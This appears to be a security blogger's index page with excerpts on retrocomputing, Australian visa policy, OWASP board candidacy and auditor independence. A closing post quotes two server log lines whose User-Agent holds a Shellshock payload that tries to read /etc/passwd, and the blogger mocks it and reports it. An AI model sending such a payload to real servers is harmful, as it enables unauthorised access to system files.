Porting Freemint to ARM – Retro Challenge RC2017/10

The Retro Challenge is an interesting idea – pick a project that is over 10 years old, and blog about working on it for a month. Most folks pick older computers that they acquire and fix up, or do something interesting, such as adding network functionality to Apple IIs, or running Twitter clients over serial. These […]

Training the next generation or abolition of the Australian 457 visa

Without consultation or warning, the Australian Government has decided to abolish the speciality skilled migration 457 visa system. There is currently a great deal of confusion, but it seems that the current plan is that there are two lists of skills shortages eligible for varying lengths of temporary stay and migration outcome: The Short Term Combined Skills Shortage […]

Standing for the OWASP Board in 2017 – 2018

I am standing again for the OWASP Board, again representing the Asia Pacific region, which is a huge growth area for OWASP globally. The growth opportunities in Australia, New Zealand, Singapore, Japan, Malaysia, Philippines, and in particular, Indonesia are immense. My goal for OWASP is to transition us from a small, fast-growing non-profit to a healthy, sustainable non-profit, […]

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon-to-be-graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”. No, it’s not. And here’s why. Conflict of interest It’s only conflict of interest if a […]

Some people don’t get the hint

85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.